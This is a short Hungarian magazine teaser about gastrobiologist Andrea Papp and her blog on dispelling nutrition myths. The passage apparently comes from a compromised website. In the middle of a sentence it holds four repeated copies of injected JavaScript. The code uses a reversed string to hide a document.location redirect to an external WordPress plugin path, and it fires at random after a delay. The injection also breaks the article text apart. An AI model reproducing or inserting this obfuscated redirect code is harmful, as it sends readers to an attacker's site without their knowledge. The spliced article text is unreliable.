Egy oldal, ahol a táplálkozás és az a körüli hiedelmek eloszlatása áll a középpontban Papp Andrea gyulai származású gasztrobiológus. Az érettségit követően táplálkozástudományi MSc, biológia BSc és OKJ-s szakács végzettséget is szerzett. Jelenleg táplálkozási tanácsadóként és ismeretterjesztő cikkek írójaként dolgozik, valamint szakács az egyik hetedik kerületi budapesti bisztróban. Mindezek mellett önkéntes a Felelős Gasztrohős Alapítványnál. Megkeresésünkre elmondta, hogy a blogot 2016 áprilisában indítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tották azzal a céllal, hogy segítsenek csökkenteni a táplálkozásunk körül az utóbbi időben kialakult „pánikot”. Az is adott egy löketet az ismeretterjesztő cikkek és videók közléséhez, hogy azt tapasztalták szerzőtársaival, hogy sokaknál, annak ellenére, hogy gyakorlatilag egész évben élelmiszerek széles palettája áll…
A cikk folytatódik: http://szeniormagazin.co.hu/eletmod/2018/01/19/legyunk-nagyobb-tisztelettel-es-alazattal-az-etelek-irant.html
- Hirdetés -